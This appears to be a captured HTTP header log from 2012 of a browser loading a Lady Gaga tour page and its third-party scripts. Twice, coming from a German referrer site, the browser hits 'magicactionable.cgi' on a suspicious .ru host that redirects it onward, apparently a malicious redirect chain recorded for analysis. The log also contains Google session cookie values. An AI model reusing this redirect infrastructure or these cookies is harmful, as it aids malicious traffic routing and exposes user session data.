X-Object-Meta-X-Object-Meta-Cb-Modifiedtime: Wed, 08 Feb 2012 22:48:31 GMT
Accept-Ranges: bytes
Content-Encoding: gzip
Content-Length: 920
Cache-Control: public, max-age=597
Expires: Mon, 05 Nov 2012 19:11:59 GMT
Date: Mon, 05 Nov 2012 19:02:02 GMT
Connection: keep-alive
GET /libs/v1/LMKSubscription/LMKSubscription.js HTTP/1.1

Host: cdn.realtidbits.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Mon, 08 Oct 2012 14:37:15 GMT
Etag: a6af50b1ec19dd8d274e6e92f5cce645
Vary: Accept-Encoding
X-Trans-Id: txedcadf60c444401db3e518a816673a00
X-Timestamp: 1349707035.33234
X-Object-Meta-X-Object-Meta-Cb-Modifiedtime: Wed, 18 Jul 2012 21:41:45 GMT
Accept-Ranges: bytes
Content-Encoding: gzip
Content-Length: 3681
Cache-Control: public, max-age=592
Expires: Mon, 05 Nov 2012 19:11:54 GMT
Date: Mon, 05 Nov 2012 19:02:02 GMT
Connection: keep-alive
GET /libs/v1/janrain-sharing.js HTTP/1.1

Host: cdn.realtidbits.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Tue, 09 Oct 2012 20:08:53 GMT
Etag: 9ced29d8008d303ccc1d061a55af072b
Vary: Accept-Encoding
X-Timestamp: 1349813333.73462
X-Object-Meta-X-Object-Meta-Cb-Modifiedtime: Tue, 09 Oct 2012 19:52:40 GMT
Accept-Ranges: bytes
X-Trans-Id: tx0184fd601d784071a6c3007b1dae9792
Content-Encoding: gzip
Content-Length: 3774
Cache-Control: public, max-age=536
Expires: Mon, 05 Nov 2012 19:10:58 GMT
Date: Mon, 05 Nov 2012 19:02:02 GMT
Connection: keep-alive
GET /libs/v1/rssfeed/rssfeed.js HTTP/1.1

Host: cdn.realtidbits.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Mon, 08 Oct 2012 14:36:16 GMT
Etag: d4066fbbc47a910e4627d6a348a844c5
Vary: Accept-Encoding
X-Trans-Id: tx6161a360f1064eb0934b081334a78ad4
X-Timestamp: 1349706976.17651
X-Object-Meta-X-Object-Meta-Cb-Modifiedtime: Wed, 16 May 2012 16:57:43 GMT
Accept-Ranges: bytes
Content-Encoding: gzip
Content-Length: 903
Cache-Control: public, max-age=739
Expires: Mon, 05 Nov 2012 19:14:21 GMT
Date: Mon, 05 Nov 2012 19:02:02 GMT
Connection: keep-alive
GET /translate_a/element.js?cb=googleTranslateElementInit HTTP/1.1

Host: translate.google.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
Cookie: PREF=ID=18d07d2c5ecbbb08:U=205ee10a10512bfa:FF=0:TM=1350344350:LM=1350344627:S=oVTvNjgbzbFNBNUF; NID=64=UOjfkeau7k9dzmFvAsFwVqmD4s7g_bdUMaEnGOlKRSTKCit3R_G5xg2kMKTOgRf2IL0DzvimBbfFpj1mIHK6cKNk76wCsEyOlULvzyFq8aklSyHHGXGPdMpqcZCr8LfK
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=UTF-8
Date: Mon, 05 Nov 2012 19:02:02 GMT
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Language: en
Pragma: no-cache
X-Content-Type-Options: nosniff
Content-Disposition: attachment
Content-Encoding: gzip
Server: HTTP server (unknown)
Content-Length: 702
X-XSS-Protection: 1; mode=block
GET /magicactionable.cgi?8 HTTP/1.1

Host: nullifiedfilebyfile.ru

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.frozen-backside.de/index.php?page=Index
HTTP/1.1 302 Found

Content-Type: text/html
Server: nginx
Date: Mon, 05 Nov 2012 19:04:18 GMT
Connection: keep-alive
Set-Cookie: bzurh8=_0_; expires=Tue, 06-Nov-2012 19:04:18 GMT; path=/; domain=nullifiedfilebyfile.ru
Location: http://www.ladygaga.com
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 156
GET /libs/v1/inlinemedia.js HTTP/1.1

Host: cdn.realtidbits.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Mon, 08 Oct 2012 14:37:17 GMT
Etag: 35ae6191644b888dabe69146781fda26
Vary: Accept-Encoding
X-Trans-Id: txec26333a363a44479e11d4445606df9b
X-Timestamp: 1349707037.75438
X-Object-Meta-X-Object-Meta-Cb-Modifiedtime: Thu, 27 Sep 2012 16:57:21 GMT
Accept-Ranges: bytes
Content-Encoding: gzip
Content-Length: 4413
Cache-Control: public, max-age=128
Expires: Mon, 05 Nov 2012 19:04:10 GMT
Date: Mon, 05 Nov 2012 19:02:02 GMT
Connection: keep-alive
GET /libs/v1/sanitize.js HTTP/1.1

Host: cdn.realtidbits.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Mon, 08 Oct 2012 14:36:15 GMT
Etag: 027cafdc601111c681a84998aff7dd1c
Vary: Accept-Encoding
X-Timestamp: 1349706975.43264
X-Object-Meta-X-Object-Meta-Cb-Modifiedtime: Sat, 15 Sep 2012 15:07:32 GMT
Accept-Ranges: bytes
X-Trans-Id: txde9cc043463046b880f52d81000c7c7f
Content-Encoding: gzip
Content-Length: 1682
Cache-Control: public, max-age=101
Expires: Mon, 05 Nov 2012 19:03:43 GMT
Date: Mon, 05 Nov 2012 19:02:02 GMT
Connection: keep-alive
GET /aspnet_client/microgroove/shadowbox/shadowbox.js HTTP/1.1

Host: www.ladygaga.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
Cookie: VisitorTracking=a=4fb7e892-f111-479c-8f17-434da94d63a8&amp;b=11%2f5%2f2012+2%3a02%3a01+PM
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Wed, 14 Mar 2012 21:08:04 GMT
Accept-Ranges: bytes
Etag: &quot;aafc48b262cd1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Encoding: gzip
Content-Length: 7680
Vary: Accept-Encoding
Cache-Control: private, max-age=481
Date: Mon, 05 Nov 2012 19:02:02 GMT
Connection: keep-alive
GET /aspnet_client/microgroove/shared.min.js HTTP/1.1

Host: www.ladygaga.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
Cookie: VisitorTracking=a=4fb7e892-f111-479c-8f17-434da94d63a8&amp;b=11%2f5%2f2012+2%3a02%3a01+PM
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Wed, 14 Mar 2012 21:08:01 GMT
Accept-Ranges: bytes
Etag: &quot;c4be6f8a262cd1:0&quot;
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Encoding: gzip
Content-Length: 5755
Vary: Accept-Encoding
Cache-Control: private, max-age=534
Date: Mon, 05 Nov 2012 19:02:02 GMT
Connection: keep-alive
GET /libs/v1/comments/locale/en.js HTTP/1.1

Host: cdn.realtidbits.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Mon, 08 Oct 2012 14:39:47 GMT
Etag: c5a3cd2475169ac7d7d9001b8ff6e592
Vary: Accept-Encoding
X-Trans-Id: tx851d5b101ea64ddda5091179b610a0f6
X-Timestamp: 1349707187.19912
X-Object-Meta-X-Object-Meta-Cb-Modifiedtime: Fri, 17 Aug 2012 14:39:51 GMT
Accept-Ranges: bytes
Content-Encoding: gzip
Content-Length: 1461
Cache-Control: public, max-age=456
Expires: Mon, 05 Nov 2012 19:09:38 GMT
Date: Mon, 05 Nov 2012 19:02:02 GMT
Connection: keep-alive
GET / HTTP/1.1

Host: www.ladygaga.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.frozen-backside.de/index.php?page=Index
Cookie: VisitorTracking=a=4fb7e892-f111-479c-8f17-434da94d63a8&amp;b=11%2f5%2f2012+2%3a02%3a02+PM
HTTP/1.1 302 Moved Temporarily

Content-Type: text/html
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 133
Location: /bornthiswayball/
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Mon, 05 Nov 2012 19:02:02 GMT
Connection: keep-alive
GET /widget.js?v3 HTTP/1.1

Host: fanrx.universalmusic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Age: 6959
Cache-Control: max-age=14400
Date: Mon, 05 Nov 2012 19:02:02 GMT
Etag: &quot;5ec007-738-4b6eb93146600&quot;
Expires: Mon, 05 Nov 2012 21:03:46 GMT
Last-Modified: Fri, 20 Jan 2012 01:26:48 GMT
Server: Apache/2.2.16 (Amazon)
Via: 1.1 varnish
X-Cached: true
X-Varnish: 1883297670 1882885730
Content-Length: 1848
Connection: keep-alive
GET /libs/v1/comments/comments_core.js HTTP/1.1

Host: cdn.realtidbits.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Thu, 18 Oct 2012 15:06:46 GMT
Etag: 147654c56478384a7094c5cd9ec6de98
Vary: Accept-Encoding
X-Timestamp: 1350572806.00980
X-Object-Meta-X-Object-Meta-Cb-Modifiedtime: Thu, 18 Oct 2012 15:06:26 GMT
Accept-Ranges: bytes
X-Trans-Id: tx1fbcdb88d7e9459298d9fb9a2b8e6299
Content-Encoding: gzip
Content-Length: 12370
Cache-Control: public, max-age=288
Expires: Mon, 05 Nov 2012 19:06:50 GMT
Date: Mon, 05 Nov 2012 19:02:02 GMT
Connection: keep-alive
POST / HTTP/1.1

Host: ocsp.digicert.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 115
Content-Type: application/ocsp-request
HTTP/1.1 200 OK

Content-Type: application/ocsp-response
Server: nginx
Date: Mon, 05 Nov 2012 19:02:02 GMT
Connection: keep-alive
Content-Length: 471
Last-Modified: Mon, 05 Nov 2012 16:16:15 GMT
Expires: Sun, 11 Nov 2012 16:16:15 GMT
Cache-Control: max-age=509718
Accept-Ranges: bytes
GET /libs/v1/notifications/notifications.js HTTP/1.1

Host: cdn.realtidbits.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Last-Modified: Mon, 08 Oct 2012 14:37:00 GMT
Etag: 3a452158facfc29c920a7c14752c505a
Vary: Accept-Encoding
X-Timestamp: 1349707020.89797
X-Object-Meta-X-Object-Meta-Cb-Modifiedtime: Mon, 07 May 2012 17:31:22 GMT
Accept-Ranges: bytes
X-Trans-Id: tx7da5e23733734615ab6dbdc7770bf03f
Content-Encoding: gzip
Content-Length: 9786
Cache-Control: public, max-age=224
Expires: Mon, 05 Nov 2012 19:05:46 GMT
Date: Mon, 05 Nov 2012 19:02:02 GMT
Connection: keep-alive
GET /magicactionable.cgi?8 HTTP/1.1

Host: nullifiedfilebyfile.ru

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.frozen-backside.de/index.php?page=Index
Cookie: bzurh8=_0_
HTTP/1.1 302 Found

Content-Type: text/html
Server: nginx
Date: Mon, 05 Nov 2012 19:04:18 GMT
Connection: keep-alive
Set-Cookie: bzurh8=_0_; expires=Tue, 06-Nov-2012 19:04:18 GMT; path=/; domain=nullifiedfilebyfile.ru
Location: http://www.ladygaga.com
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 156
POST / HTTP/1.1

Host: ocsp.digicert.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 115
Content-Type: application/ocsp-request
HTTP/1.1 200 OK

Content-Type: application/ocsp-response
Server: nginx
Date: Mon, 05 Nov 2012 19:02:02 GMT
Connection: close
Content-Length: 471
Last-Modified: Mon, 05 Nov 2012 16:36:13 GMT
Expires: Sun, 11 Nov 2012 16:36:13 GMT
Cache-Control: max-age=510606
Accept-Ranges: bytes
GET /clientapps/v2/packs/full-no-jquery-pack.js HTTP/1.1

Host: cdn.echoenabled.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: application/javascript
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Encoding: gzip
Cache-Control: max-age=86400
Age: 39973
Date: Mon, 05 Nov 2012 19:02:02 GMT
Last-Modified: Thu, 01 Nov 2012 07:53:09 GMT
Expires: Tue, 06 Nov 2012 07:55:49 GMT
Content-Length: 100461
Connection: keep-alive
GET / HTTP/1.1

Host: www.ladygaga.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.frozen-backside.de/index.php?page=Index
Cookie: VisitorTracking=a=4fb7e892-f111-479c-8f17-434da94d63a8&amp;b=11%2f5%2f2012+2%3a02%3a02+PM
HTTP/1.1 302 Moved Temporarily

Content-Type: text/html
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 133
Location: /bornthiswayball/
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Mon, 05 Nov 2012 19:02:02 GMT
Connection: keep-alive
GET /bornthiswayball/ HTTP/1.1

Host: www.ladygaga.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.frozen-backside.de/index.php?page=Index
Cookie: VisitorTracking=a=4fb7e892-f111-479c-8f17-434da94d63a8&amp;b=11%2f5%2f2012+2%3a02%3a02+PM
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: private
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Encoding: gzip
Content-Length: 11344
Vary: Accept-Encoding
Date: Mon, 05 Nov 2012 19:02:02 GMT
Connection: keep-alive
Set-Cookie: VisitorTracking=a=4fb7e892-f111-479c-8f17-434da94d63a8&amp;b=11%2f5%2f2012+2%3a02%3a01+PM; path=/
POST / HTTP/1.1

Host: ocsp.digicert.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 115
Content-Type: application/ocsp-request
HTTP/1.1 200 OK

Content-Type: application/ocsp-response
Server: nginx
Date: Mon, 05 Nov 2012 19:02:02 GMT
Connection: keep-alive
Content-Length: 471
Last-Modified: Mon, 05 Nov 2012 16:16:11 GMT
Expires: Sun, 11 Nov 2012 16:16:11 GMT
Cache-Control: max-age=509975
Accept-Ranges: bytes
GET / HTTP/1.1

Host: www.ladygaga.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.frozen-backside.de/index.php?page=Index
Cookie: VisitorTracking=a=4fb7e892-f111-479c-8f17-434da94d63a8&amp;b=11%2f5%2f2012+2%3a02%3a01+PM
HTTP/1.1 302 Moved Temporarily

Content-Type: text/html
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 133
Location: /bornthiswayball/
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Mon, 05 Nov 2012 19:02:02 GMT
Connection: keep-alive
GET /bornthiswayball/ HTTP/1.1

Host: www.ladygaga.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.frozen-backside.de/index.php?page=Index
Cookie: VisitorTracking=a=4fb7e892-f111-479c-8f17-434da94d63a8&amp;b=11%2f5%2f2012+2%3a02%3a02+PM
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: private
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Encoding: gzip
Content-Length: 11344
Vary: Accept-Encoding
Date: Mon, 05 Nov 2012 19:02:02 GMT
Connection: keep-alive
Set-Cookie: VisitorTracking=a=4fb7e892-f111-479c-8f17-434da94d63a8&amp;b=11%2f5%2f2012+2%3a02%3a02+PM; path=/
GET /v1.2/bus/umg/channel/new?callback=Backplane.finishInit&rnd=0.9686262100600623 HTTP/1.1

Host: backplane1.janrainbackplane.com
GET /v1.2/bus/umg/channel/new?callback=Backplane.finishInit&amp;rnd=0.9686262100600623 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: text/javascript;charset=UTF-8
Date: Mon, 05 Nov 2012 19:02:01 GMT
EC2-instance-id: i-df4aeaa4
Server: Apache-Coyote/1.1
X-BP-Instance: BP1-BP_2_0.2012.41_RC1_A
Content-Length: 57
Connection: keep-alive
GET /v1.2/bus/umg/channel/new?callback=Backplane.finishInit&rnd=0.3496526987948355 HTTP/1.1

Host: backplane1.janrainbackplane.com
GET /v1.2/bus/umg/channel/new?callback=Backplane.finishInit&amp;rnd=0.3496526987948355 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: text/javascript;charset=UTF-8
Date: Mon, 05 Nov 2012 19:02:02 GMT
EC2-instance-id: i-cb16f5af
Server: Apache-Coyote/1.1
X-BP-Instance: BP1-BP_2_0.2012.41_RC1_A
Content-Length: 57
Connection: keep-alive
GET /v1.2/bus/umg/channel/ca9f1ef1fb350d121f136d7a8debdfac?callback=Backplane.response&rnd=0.3684267853447777 HTTP/1.1

Host: backplane1.janrainbackplane.com
GET /v1.2/bus/umg/channel/ca9f1ef1fb350d121f136d7a8debdfac?callback=Backplane.response&amp;rnd=0.3684267853447777 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: text/javascript;charset=UTF-8
Date: Mon, 05 Nov 2012 19:02:02 GMT
EC2-instance-id: i-4f41e134
Server: Apache-Coyote/1.1
X-BP-Instance: BP1-BP_2_0.2012.41_RC1_A
Content-Length: 23
Connection: keep-alive
GET /ajax/libs/jquery/1.6.2/jquery.min.js HTTP/1.1

Host: ajax.googleapis.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=UTF-8
Vary: Accept-Encoding
Content-Encoding: gzip
Last-Modified: Mon, 02 Apr 2012 18:24:28 GMT
Date: Thu, 01 Nov 2012 01:09:07 GMT
Expires: Fri, 01 Nov 2013 01:09:07 GMT
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 32111
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=31536000
Age: 409975
GET /bornthiswayball/ HTTP/1.1

Host: www.ladygaga.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.frozen-backside.de/index.php?page=Index
Cookie: VisitorTracking=a=4fb7e892-f111-479c-8f17-434da94d63a8&amp;b=11%2f5%2f2012+2%3a02%3a01+PM
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: private
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Content-Encoding: gzip
Content-Length: 11344
Vary: Accept-Encoding
Date: Mon, 05 Nov 2012 19:02:02 GMT
Connection: keep-alive
Set-Cookie: VisitorTracking=a=4fb7e892-f111-479c-8f17-434da94d63a8&amp;b=11%2f5%2f2012+2%3a02%3a02+PM; path=/
GET /sso.js HTTP/1.1

Host: sso.universalmusic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ladygaga.com/bornthiswayball/
HTTP/1.1 200 OK

Content-Type: text/javascript
Accept-Ranges: bytes
Date: Mon, 05 Nov 2012 19:02:02 GMT
EC2-instance-id: i-8bec1df0
Etag: W/&quot;16391-1349275618000&quot;
Last-Modified: Wed, 03 Oct 2012 14:46:58 GMT
P3P: CP=&quot;IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT&quot;
Server: Apache-Coyote/1.1
X-SSO-Instance: SSO1-2012.40_RC2
Content-Length: 16391
Connection: keep-alive
GET /v1.2/bus/umg/channel/585ac179036b74a26c2b4d7fc013d9fa?callback=Backplane.response&rnd=0.5028386343263664 HTTP/1.1

Host: backplane1.janrainbackplane.com
